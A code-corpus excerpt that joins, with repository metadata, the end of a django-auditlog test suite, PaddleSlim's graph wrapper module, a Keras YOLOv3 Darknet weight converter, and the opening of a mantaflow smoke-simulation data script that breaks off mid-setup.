self.assertIsNotNone(log_entry.additional_data) extra_data = log_entry.additional_data self.assertTrue(extra_data['related_model_text'] == related_model.text, msg="Related model's text is logged") self.assertTrue(extra_data['related_model_id'] == related_model.id, msg="Related model's id is logged") def test_model_with_additional_data_and_kwargs(self): related_model = SimpleModel.objects.create(text='Log my reference') obj_with_additional_data = AdditionalDataIncludedWithKwargsModel( label='Additional data to log entries', related=related_model) obj_with_additional_data.save() self.assertTrue(obj_with_additional_data.history.count() == 1, msg="There is 1 log entry") log_entry = obj_with_additional_data.history.get() self.assertIsNotNone(log_entry.additional_data) extra_data = log_entry.additional_data self.assertTrue(extra_data['action'] == 0, msg="Related model's create action is logged in additional data") obj_with_additional_data.label = "update test" obj_with_additional_data.save() self.assertTrue(obj_with_additional_data.history.count() == 2, msg="There are 2 log entries") log_entry = obj_with_additional_data.history.first() extra_data = log_entry.additional_data self.assertTrue(extra_data['action'] == 1, msg="Related model's update action is logged in additional data") class DateTimeFieldModelTest(TestCase): """Tests if DateTimeField changes are recognised correctly""" utc_plus_one = timezone.get_fixed_timezone(datetime.timedelta(hours=1)) now = timezone.now() def test_model_with_same_time(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to same datetime and timezone timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) dtm.timestamp = timestamp dtm.date = datetime.date(2017, 1, 10) dtm.time = datetime.time(12, 0) dtm.save() # Nothing should have changed self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") def test_model_with_different_timezone(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to same datetime in another timezone timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=self.utc_plus_one) dtm.timestamp = timestamp dtm.save() # Nothing should have changed self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") def test_model_with_different_datetime(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to another datetime in the same timezone timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=timezone.utc) dtm.timestamp = timestamp dtm.save() # The time should have changed. self.assertTrue(dtm.history.count() == 2, msg="There are two log entries") def test_model_with_different_date(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to another datetime in the same timezone date = datetime.datetime(2017, 1, 11) dtm.date = date dtm.save() # The time should have changed. self.assertTrue(dtm.history.count() == 2, msg="There are two log entries") def test_model_with_different_time(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to another datetime in the same timezone time = datetime.time(6, 0) dtm.time = time dtm.save() # The time should have changed. self.assertTrue(dtm.history.count() == 2, msg="There are two log entries") def test_model_with_different_time_and_timezone(self): timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.count() == 1, msg="There is one log entry") # Change timestamp to another datetime and another timezone timestamp = datetime.datetime(2017, 1, 10, 14, 0, tzinfo=self.utc_plus_one) dtm.timestamp = timestamp dtm.save() # The time should have changed. self.assertTrue(dtm.history.count() == 2, msg="There are two log entries") def test_changes_display_dict_datetime(self): timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE)) self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \ dateformat.format(localized_timestamp, settings.DATETIME_FORMAT), msg=("The datetime should be formatted according to Django's settings for" " DATETIME_FORMAT")) timestamp = timezone.now() dtm.timestamp = timestamp dtm.save() localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE)) self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \ dateformat.format(localized_timestamp, settings.DATETIME_FORMAT), msg=("The datetime should be formatted according to Django's settings for" " DATETIME_FORMAT")) # Change USE_L10N = True with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'): self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \ formats.localize(localized_timestamp), msg=("The datetime should be formatted according to Django's settings for" " USE_L10N is True with a different LANGUAGE_CODE.")) def test_changes_display_dict_date(self): timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \ dateformat.format(date, settings.DATE_FORMAT), msg=("The date should be formatted according to Django's settings for" " DATE_FORMAT unless USE_L10N is True.")) date = datetime.date(2017, 1, 11) dtm.date = date dtm.save() self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \ dateformat.format(date, settings.DATE_FORMAT), msg=("The date should be formatted according to Django's settings for" " DATE_FORMAT unless USE_L10N is True.")) # Change USE_L10N = True with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'): self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \ formats.localize(date), msg=("The date should be formatted according to Django's settings for" " USE_L10N is True with a different LANGUAGE_CODE.")) def test_changes_display_dict_time(self): timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \ dateformat.format(time, settings.TIME_FORMAT), msg=("The time should be formatted according to Django's settings for" " TIME_FORMAT unless USE_L10N is True.")) time = datetime.time(6, 0) dtm.time = time dtm.save() self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \ dateformat.format(time, settings.TIME_FORMAT), msg=("The time should be formatted according to Django's settings for" " TIME_FORMAT unless USE_L10N is True.")) # Change USE_L10N = True with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'): self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \ formats.localize(time), msg=("The time should be formatted according to Django's settings for" " USE_L10N is True with a different LANGUAGE_CODE.")) def test_update_naive_dt(self): timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc) date = datetime.date(2017, 1, 10) time = datetime.time(12, 0) dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now) dtm.save() # Change with naive field doesnt raise error dtm.naive_dt = timezone.make_naive(timezone.now(), timezone=timezone.utc) dtm.save() class UnregisterTest(TestCase): def setUp(self): auditlog.unregister(SimpleModel) self.obj = SimpleModel.objects.create(text='No history') def tearDown(self): # Re-register for future tests auditlog.register(SimpleModel) def test_unregister_create(self): """Creation is not logged after unregistering.""" # Get the object to work with obj = self.obj # Check for log entries self.assertTrue(obj.history.count() == 0, msg="There are no log entries") def test_unregister_update(self): """Updates are not logged after unregistering.""" # Get the object to work with obj = self.obj # Change something obj.boolean = True obj.save() # Check for log entries self.assertTrue(obj.history.count() == 0, msg="There are no log entries") def test_unregister_delete(self): """Deletion is not logged after unregistering.""" # Get the object to work with obj = self.obj # Delete the object obj.delete() # Check for log entries self.assertTrue(LogEntry.objects.count() == 0, msg="There are no log entries") class ChoicesFieldModelTest(TestCase): def setUp(self): self.obj = ChoicesFieldModel.objects.create( status=ChoicesFieldModel.RED, multiplechoice=[ChoicesFieldModel.RED, ChoicesFieldModel.YELLOW, ChoicesFieldModel.GREEN], ) def test_changes_display_dict_single_choice(self): self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Red", msg="The human readable text 'Red' is displayed.") self.obj.status = ChoicesFieldModel.GREEN self.obj.save() self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Green", msg="The human readable text 'Green' is displayed.") def test_changes_display_dict_multiplechoice(self): self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red, Yellow, Green", msg="The human readable text 'Red, Yellow, Green' is displayed.") self.obj.multiplechoice = ChoicesFieldModel.RED self.obj.save() self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red", msg="The human readable text 'Red' is displayed.") class CharfieldTextfieldModelTest(TestCase): def setUp(self): self.PLACEHOLDER_LONGCHAR = "s" * 255 self.PLACEHOLDER_LONGTEXTFIELD = "s" * 1000 self.obj = CharfieldTextfieldModel.objects.create( longchar=self.PLACEHOLDER_LONGCHAR, longtextfield=self.PLACEHOLDER_LONGTEXTFIELD, ) def test_changes_display_dict_longchar(self): self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == \ "{}...".format(self.PLACEHOLDER_LONGCHAR[:140]), msg="The string should be truncated at 140 characters with an ellipsis at the end.") SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGCHAR[:139] self.obj.longchar = SHORTENED_PLACEHOLDER self.obj.save() self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == SHORTENED_PLACEHOLDER, msg="The field should display the entire string because it is less than 140 characters") def test_changes_display_dict_longtextfield(self): self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == \ "{}...".format(self.PLACEHOLDER_LONGTEXTFIELD[:140]), msg="The string should be truncated at 140 characters with an ellipsis at the end.") SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGTEXTFIELD[:139] self.obj.longtextfield = SHORTENED_PLACEHOLDER self.obj.save() self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == SHORTENED_PLACEHOLDER, msg="The field should display the entire string because it is less than 140 characters") class PostgresArrayFieldModelTest(TestCase): databases = '__all__' def setUp(self): self.obj = PostgresArrayFieldModel.objects.create( arrayfield=[PostgresArrayFieldModel.RED, PostgresArrayFieldModel.GREEN], ) @property def latest_array_change(self): return self.obj.history.latest().changes_display_dict["arrayfield"][1] def test_changes_display_dict_arrayfield(self): self.assertTrue(self.latest_array_change == "Red, Green", msg="The human readable text for the two choices, 'Red, Green' is displayed.") self.obj.arrayfield = [PostgresArrayFieldModel.GREEN] self.obj.save() self.assertTrue(self.latest_array_change == "Green", msg="The human readable text 'Green' is displayed.") self.obj.arrayfield = [] self.obj.save() self.assertTrue(self.latest_array_change == "", msg="The human readable text '' is displayed.") self.obj.arrayfield = [PostgresArrayFieldModel.GREEN] self.obj.save() self.assertTrue(self.latest_array_change == "Green", msg="The human readable text 'Green' is displayed.") class CompatibilityTest(TestCase): """Test case for compatibility functions.""" def test_is_authenticated(self): """Test that the 'is_authenticated' compatibility function is working. Bit of explanation: the `is_authenticated` property on request.user is *always* set to 'False' for AnonymousUser, and it is *always* set to 'True' for *any* other (i.e. identified/authenticated) user. So, the logic of this test is to ensure that compat.is_authenticated() returns the correct value based on whether or not the User is an anonymous user (simulating what goes on in the real request.user). """ # Test compat.is_authenticated for anonymous users self.user = auth.get_user(self.client) if django.VERSION < (1, 10): assert self.user.is_anonymous() else: assert self.user.is_anonymous assert not compat.is_authenticated(self.user) # Setup some other user, which is *not* anonymous, and check # compat.is_authenticated self.user = User.objects.create( username="test.user", email="test.user@mail.com", password="auditlog" ) if django.VERSION < (1, 10): assert not self.user.is_anonymous() else: assert not self.user.is_anonymous assert compat.is_authenticated(self.user) class AdminPanelTest(TestCase): @classmethod def setUpTestData(cls): cls.username = "test_admin" cls.password = User.objects.make_random_password() cls.user, created = User.objects.get_or_create(username=cls.username) cls.user.set_password(cls.password) cls.user.is_staff = True cls.user.is_superuser = True cls.user.is_active = True cls.user.save() cls.obj = SimpleModel.objects.create(text='For admin logentry test') def test_auditlog_admin(self): self.client.login(username=self.username, password=self.password) log_pk = self.obj.history.latest().pk res = self.client.get("/admin/auditlog/logentry/") assert res.status_code == 200 res = self.client.get("/admin/auditlog/logentry/add/") assert res.status_code == 200 res = self.client.get("/admin/auditlog/logentry/{}/".format(log_pk), follow=True) assert res.status_code == 200 res = self.client.get("/admin/auditlog/logentry/{}/delete/".format(log_pk)) assert res.status_code == 200 res = self.client.get("/admin/auditlog/logentry/{}/history/".format(log_pk)) assert res.status_code == 200 class NoDeleteHistoryTest(TestCase): def test_delete_related(self): instance = SimpleModel.objects.create(integer=1) assert LogEntry.objects.all().count() == 1 instance.integer = 2 instance.save() assert LogEntry.objects.all().count() == 2 instance.delete() entries = LogEntry.objects.order_by('id') # The "DELETE" record is always retained assert LogEntry.objects.all().count() == 1 assert entries.first().action == LogEntry.Action.DELETE def test_no_delete_related(self): instance = NoDeleteHistoryModel.objects.create(integer=1) self.assertEqual(LogEntry.objects.all().count(), 1) instance.integer = 2 instance.save() self.assertEqual(LogEntry.objects.all().count(), 2) instance.delete() entries = LogEntry.objects.order_by('id') self.assertEqual(entries.count(), 3) self.assertEqual( list(entries.values_list('action', flat=True)), [LogEntry.Action.CREATE, LogEntry.Action.UPDATE, LogEntry.Action.DELETE] )
43.763121
199
0.649402
f0fca9336734096ae4c63a992ee89e802a125b3b
10,715
py
Python
paddleslim/core/graph_wrapper.py
ZichaoGuo/PaddleSlim
2550fb4ec86aee6155c1c8a2c9ab174e239918a3
[ "Apache-2.0" ]
926
2019-12-16T05:06:56.000Z
2022-03-31T07:22:10.000Z
paddleslim/core/graph_wrapper.py
ZichaoGuo/PaddleSlim
2550fb4ec86aee6155c1c8a2c9ab174e239918a3
[ "Apache-2.0" ]
327
2019-12-16T06:04:31.000Z
2022-03-30T11:08:18.000Z
paddleslim/core/graph_wrapper.py
ZichaoGuo/PaddleSlim
2550fb4ec86aee6155c1c8a2c9ab174e239918a3
[ "Apache-2.0" ]
234
2019-12-16T03:12:08.000Z
2022-03-27T12:59:39.000Z
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import copy import pickle import numpy as np from collections import OrderedDict from collections.abc import Iterable from paddle.fluid.framework import Program, program_guard, Parameter, Variable __all__ = ['GraphWrapper', 'VarWrapper', 'OpWrapper'] OPTIMIZER_OPS = [ 'momentum', 'lars_momentum', 'adagrad', 'adam', 'adamax', 'dpsgd', 'decayed_adagrad', 'adadelta', 'rmsprop', ] class VarWrapper(object): def __init__(self, var, graph): assert isinstance(var, Variable) assert isinstance(graph, GraphWrapper) self._var = var self._graph = graph def __eq__(self, v): """ Overwrite this function for ...in... syntax in python. """ return (v is not None) and self._var.name == v._var.name def name(self): """ Get the name of the variable. """ return self._var.name def __repr__(self): return self._var.name def __lt__(self, other): return self._var.name < other._var.name def __gt__(self, other): return self._var.name > other._var.name def __eq__(self, other): return self._var.name == other._var.name def shape(self): """ Get the shape of the varibale. """ return self._var.shape def set_shape(self, shape): """ Set the shape of the variable. """ self._var.desc.set_shape(shape) def inputs(self): """ Get all the operators that use this variable as output. Returns: list<OpWrapper>: A list of operators. """ ops = [] for op in self._graph.ops(): if self in op.all_outputs(): ops.append(op) return ops def outputs(self): """ Get all the operators that use this variable as input. Returns: list<OpWrapper>: A list of operators. """ ops = [] for op in self._graph.ops(): if self in op.all_inputs(): ops.append(op) return ops def is_parameter(self): return isinstance(self._var, Parameter) class OpWrapper(object): def __init__(self, op, graph): assert isinstance(graph, GraphWrapper) self._op = op self._graph = graph def __eq__(self, op): """ Overwrite this function for ...in... syntax in python. """ return self.idx() == op.idx() def all_inputs(self): """ Get all the input variables of this operator. """ return [ self._graph.var(var_name) for var_name in self._op.input_arg_names ] def all_outputs(self): """ Get all the output variables of this operator. """ return [ self._graph.var(var_name) for var_name in self._op.output_arg_names ] def idx(self): """ Get the id of this operator. """ return self._op.idx def type(self): """ Get the type of this operator. """ return self._op.type def __repr__(self): return "op[id: {}, type: {}; inputs: {}]".format(self.idx(), self.type(), self.all_inputs()) def __lt__(self, other): return self._op.idx < other._op.idx def __gt__(self, other): return self._op.idx > other._op.idx def __eq__(self, other): return self._op.idx == other._op.idx def is_bwd_op(self): """ Whether this operator is backward op. """ return self.type().endswith('_grad') def is_opt_op(self): """ Whether this operator is optimizer op. """ return self.type() in OPTIMIZER_OPS def inputs(self, name): """ Get all the varibales by the input name. """ if name in self._op.input_names: return [ self._graph.var(var_name) for var_name in self._op.input(name) ] return [] def outputs(self, name): """ Get all the varibales by the output name. """ if name in self._op.output_names: return [ self._graph.var(var_name) for var_name in self._op.output(name) ] return [] def set_attr(self, key, value): """ Set the value of attribute by attribute's name. Args: key(str): the attribute name. value(bool|int|str|float|list): the value of the attribute. """ self._op._set_attr(key, value) def attr(self, name): """ Get the attribute by name. Args: name(str): the attribute name. Returns: bool|int|str|float|list: The attribute value. The return value can be any valid attribute type. """ if self._op.has_attr(name): return self._op.attr(name) else: return None class GraphWrapper(object): """ It is a wrapper of paddle.fluid.framework.IrGraph with some special functions for paddle slim framework. Args: program(framework.Program): A program with in_nodes(dict): A dict to indicate the input nodes of the graph. The key is user-defined and human-readable name. The value is the name of Variable. out_nodes(dict): A dict to indicate the input nodes of the graph. The key is user-defined and human-readable name. The value is the name of Variable. """ def __init__(self, program=None, in_nodes=[], out_nodes=[]): """ """ super(GraphWrapper, self).__init__() self.program = Program() if program is None else program self.persistables = {} self.teacher_persistables = {} for var in self.program.list_vars(): if var.persistable: self.persistables[var.name] = var self.compiled_graph = None in_nodes = [] if in_nodes is None else in_nodes out_nodes = [] if out_nodes is None else out_nodes self.in_nodes = OrderedDict(in_nodes) self.out_nodes = OrderedDict(out_nodes) self._attrs = OrderedDict() def all_parameters(self): """ Get all the parameters in this graph. Returns: list<VarWrapper>: A list of VarWrapper instances. """ params = [] for block in self.program.blocks: for param in block.all_parameters(): params.append(VarWrapper(param, self)) return params def is_parameter(self, var): """ Whether the given variable is parameter. Args: var(VarWrapper): The given varibale. """ return isinstance(var._var, Parameter) def is_persistable(self, var): """ Whether the given variable is persistable. Args: var(VarWrapper): The given varibale. """ return var._var.persistable def ops(self): """ Return all operator nodes included in the graph as a set. """ ops = [] for block in self.program.blocks: for op in block.ops: ops.append(OpWrapper(op, self)) return ops def vars(self): """ Get all the variables. """ return [VarWrapper(var, self) for var in self.program.list_vars()] def var(self, name): """ Get the variable by variable name. """ for block in self.program.blocks: if block.has_var(name): return VarWrapper(block.var(name), self) return None def clone(self, for_test=False): """ Clone a new graph from current graph. Returns: (GraphWrapper): The wrapper of a new graph. """ return GraphWrapper( self.program.clone(for_test), copy.deepcopy(self.in_nodes), copy.deepcopy(self.out_nodes)) def program(self): """ Get the program in current wrapper. """ return self.program def pre_ops(self, op): """ Get all the previous operators of target operator. Args: op(OpWrapper): Target operator. Returns: list<OpWrapper>: A list of operators. """ ops = [] for p in self.ops(): for in_var in op.all_inputs(): if in_var in p.all_outputs(): ops.append(p) return ops def next_ops(self, op): """ Get all the next operators of target operator. Args: op(OpWrapper): Target operator. Returns: list<OpWrapper>: A list of operators. """ ops = [] for p in self.ops(): for out_var in op.all_outputs(): if out_var in p.all_inputs(): ops.append(p) return ops def get_param_by_op(self, op): """ Get the parameters used by target operator. """ assert isinstance(op, OpWrapper) params = [] for var in op.all_inputs(): if isinstance(var._var, Parameter): params.append(var) assert len(params) > 0 return params def numel_params(self): """ Get the number of elements in all parameters. """ ret = 0 for param in self.all_parameters(): ret += np.product(param.shape()) return ret def infer_shape(self): """ Update the groups of convolution layer according to current filters. It is used after loading pruned parameters from file. """ for op in self.ops(): if op.type() != 'conditional_block': op._op.desc.infer_shape(op._op.block.desc)
27.334184
81
0.55399
bb66fe3bab18e509025676957911cbd8f8be6a93
10,210
py
Python
convert.py
aturX/yolo3-keras-start
f473e9f2ad32745e19509b738f2651119aee449b
[ "MIT" ]
null
null
null
convert.py
aturX/yolo3-keras-start
f473e9f2ad32745e19509b738f2651119aee449b
[ "MIT" ]
null
null
null
convert.py
aturX/yolo3-keras-start
f473e9f2ad32745e19509b738f2651119aee449b
[ "MIT" ]
null
null
null
#! /usr/bin/env python """ Reads Darknet config and weights and creates Keras model with TF backend. """ import argparse import configparser import io import os from collections import defaultdict import numpy as np from keras import backend as K from keras.layers import (Conv2D, Input, ZeroPadding2D, Add, UpSampling2D, MaxPooling2D, Concatenate) from keras.layers.advanced_activations import LeakyReLU from keras.layers.normalization import BatchNormalization from keras.models import Model from keras.regularizers import l2 from keras.utils.vis_utils import plot_model as plot parser = argparse.ArgumentParser(description='Darknet To Keras Converter.') parser.add_argument('--config_path', default='yolov3.cfg',help='Path to Darknet cfg file.') parser.add_argument('--weights_path', default='model_data/yolov3.weights',help='Path to Darknet weights file.') parser.add_argument('--output_path', default='model_data/yolo_weights.h5',help='Path to output Keras model file.') parser.add_argument( '-p', '--plot_model', help='Plot generated Keras model and save as image.', action='store_true') parser.add_argument( '-w', '--weights_only', help='Save as Keras weights file instead of model file.', action='store_true') def unique_config_sections(config_file): """Convert all config sections to have unique names. Adds unique suffixes to config sections for compability with configparser. """ section_counters = defaultdict(int) output_stream = io.StringIO() with open(config_file,encoding='utf-8') as fin: for line in fin: if line.startswith('['): section = line.strip().strip('[]') _section = section + '_' + str(section_counters[section]) section_counters[section] += 1 line = line.replace(section, _section) output_stream.write(line) output_stream.seek(0) return output_stream # %% def _main(args): config_path = os.path.expanduser(args.config_path) weights_path = os.path.expanduser(args.weights_path) assert config_path.endswith('.cfg'), '{} is not a .cfg file'.format( config_path) assert weights_path.endswith( '.weights'), '{} is not a .weights file'.format(weights_path) output_path = os.path.expanduser(args.output_path) assert output_path.endswith( '.h5'), 'output path {} is not a .h5 file'.format(output_path) output_root = os.path.splitext(output_path)[0] # Load weights and config. print('Loading weights.') weights_file = open(weights_path, 'rb') major, minor, revision = np.ndarray( shape=(3, ), dtype='int32', buffer=weights_file.read(12)) if (major*10+minor)>=2 and major<1000 and minor<1000: seen = np.ndarray(shape=(1,), dtype='int64', buffer=weights_file.read(8)) else: seen = np.ndarray(shape=(1,), dtype='int32', buffer=weights_file.read(4)) print('Weights Header: ', major, minor, revision, seen) print('Parsing Darknet config.') unique_config_file = unique_config_sections(config_path) cfg_parser = configparser.ConfigParser() cfg_parser.read_file(unique_config_file) print('Creating Keras model.') input_layer = Input(shape=(None, None, 3)) prev_layer = input_layer all_layers = [] weight_decay = float(cfg_parser['net_0']['decay'] ) if 'net_0' in cfg_parser.sections() else 5e-4 count = 0 out_index = [] for section in cfg_parser.sections(): print('Parsing section {}'.format(section)) if section.startswith('convolutional'): filters = int(cfg_parser[section]['filters']) size = int(cfg_parser[section]['size']) stride = int(cfg_parser[section]['stride']) pad = int(cfg_parser[section]['pad']) activation = cfg_parser[section]['activation'] batch_normalize = 'batch_normalize' in cfg_parser[section] padding = 'same' if pad == 1 and stride == 1 else 'valid' # Setting weights. # Darknet serializes convolutional weights as: # [bias/beta, [gamma, mean, variance], conv_weights] prev_layer_shape = K.int_shape(prev_layer) weights_shape = (size, size, prev_layer_shape[-1], filters) darknet_w_shape = (filters, weights_shape[2], size, size) weights_size = np.product(weights_shape) print('conv2d', 'bn' if batch_normalize else ' ', activation, weights_shape) conv_bias = np.ndarray( shape=(filters, ), dtype='float32', buffer=weights_file.read(filters * 4)) count += filters if batch_normalize: bn_weights = np.ndarray( shape=(3, filters), dtype='float32', buffer=weights_file.read(filters * 12)) count += 3 * filters bn_weight_list = [ bn_weights[0], # scale gamma conv_bias, # shift beta bn_weights[1], # running mean bn_weights[2] # running var ] conv_weights = np.ndarray( shape=darknet_w_shape, dtype='float32', buffer=weights_file.read(weights_size * 4)) count += weights_size # DarkNet conv_weights are serialized Caffe-style: # (out_dim, in_dim, height, width) # We would like to set these to Tensorflow order: # (height, width, in_dim, out_dim) conv_weights = np.transpose(conv_weights, [2, 3, 1, 0]) conv_weights = [conv_weights] if batch_normalize else [ conv_weights, conv_bias ] # Handle activation. act_fn = None if activation == 'leaky': pass # Add advanced activation later. elif activation != 'linear': raise ValueError( 'Unknown activation function `{}` in section {}'.format( activation, section)) # Create Conv2D layer if stride>1: # Darknet uses left and top padding instead of 'same' mode prev_layer = ZeroPadding2D(((1,0),(1,0)))(prev_layer) conv_layer = (Conv2D( filters, (size, size), strides=(stride, stride), kernel_regularizer=l2(weight_decay), use_bias=not batch_normalize, weights=conv_weights, activation=act_fn, padding=padding))(prev_layer) if batch_normalize: conv_layer = (BatchNormalization( weights=bn_weight_list))(conv_layer) prev_layer = conv_layer if activation == 'linear': all_layers.append(prev_layer) elif activation == 'leaky': act_layer = LeakyReLU(alpha=0.1)(prev_layer) prev_layer = act_layer all_layers.append(act_layer) elif section.startswith('route'): ids = [int(i) for i in cfg_parser[section]['layers'].split(',')] layers = [all_layers[i] for i in ids] if len(layers) > 1: print('Concatenating route layers:', layers) concatenate_layer = Concatenate()(layers) all_layers.append(concatenate_layer) prev_layer = concatenate_layer else: skip_layer = layers[0] # only one layer to route all_layers.append(skip_layer) prev_layer = skip_layer elif section.startswith('maxpool'): size = int(cfg_parser[section]['size']) stride = int(cfg_parser[section]['stride']) all_layers.append( MaxPooling2D( pool_size=(size, size), strides=(stride, stride), padding='same')(prev_layer)) prev_layer = all_layers[-1] elif section.startswith('shortcut'): index = int(cfg_parser[section]['from']) activation = cfg_parser[section]['activation'] assert activation == 'linear', 'Only linear activation supported.' all_layers.append(Add()([all_layers[index], prev_layer])) prev_layer = all_layers[-1] elif section.startswith('upsample'): stride = int(cfg_parser[section]['stride']) assert stride == 2, 'Only stride=2 supported.' all_layers.append(UpSampling2D(stride)(prev_layer)) prev_layer = all_layers[-1] elif section.startswith('yolo'): out_index.append(len(all_layers)-1) all_layers.append(None) prev_layer = all_layers[-1] elif section.startswith('net'): pass else: raise ValueError( 'Unsupported section header type: {}'.format(section)) # Create and save model. if len(out_index)==0: out_index.append(len(all_layers)-1) model = Model(inputs=input_layer, outputs=[all_layers[i] for i in out_index]) print(model.summary()) if args.weights_only: model.save_weights('{}'.format(output_path)) print('Saved Keras weights to {}'.format(output_path)) else: model.save('{}'.format(output_path)) print('Saved Keras model to {}'.format(output_path)) # Check to see if all weights have been read. remaining_weights = len(weights_file.read()) / 4 weights_file.close() print('Read {} of {} from Darknet weights.'.format(count, count + remaining_weights)) if remaining_weights > 0: print('Warning: {} unused weights'.format(remaining_weights)) if args.plot_model: plot(model, to_file='{}.png'.format(output_root), show_shapes=True) print('Saved model plot to {}.png'.format(output_root)) if __name__ == '__main__': _main(parser.parse_args())
38.821293
114
0.596082
70a0a25b5c28ff109eba89e22cdb59d9b9f82263
9,111
py
Python
tensorflow/example1_smoke_tiled/manta_genSimData.py
spockthegray/mantaflow
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
[ "Apache-2.0" ]
158
2018-06-24T17:42:13.000Z
2022-03-12T13:29:43.000Z
tensorflow/example1_smoke_tiled/manta_genSimData.py
spockthegray/mantaflow
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
[ "Apache-2.0" ]
5
2018-09-05T07:30:48.000Z
2020-07-01T08:56:28.000Z
tensorflow/example1_smoke_tiled/manta_genSimData.py
spockthegray/mantaflow
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
[ "Apache-2.0" ]
35
2018-06-13T04:05:42.000Z
2022-03-29T16:55:24.000Z
#****************************************************************************** # # Double sim data generation # (note, no blur when transferring hi->lo at the moment) # #****************************************************************************** from manta import * import os, shutil, math, sys, time import numpy as np sys.path.append("../tools") import paramhelpers as ph # Main params ----------------------------------------------------------------------# steps = 200 savedata = True saveppm = False simNo = 1000 # start ID showGui = 0 basePath = '../data/' npSeedstr = "-1" res = 64 # debugging #steps = 50 # shorter test #savedata = False # debug , dont write... #showGui = 1 basePath = ph.getParam( "basePath", basePath ) npSeedstr = ph.getParam( "npSeed" , npSeedstr ) simNo = int(ph.getParam( "simNo" , simNo )) res = int(ph.getParam( "res" , res )) steps = int(ph.getParam( "steps" , steps )) npSeed = int(npSeedstr) ph.checkUnusedParams() # Scene settings ---------------------------------------------------------------------# setDebugLevel(1) # Solver params ----------------------------------------------------------------------# dim = 2 offset = 20 interval = 1 scaleFactor = 4 sm_gs = vec3(res,res,res) 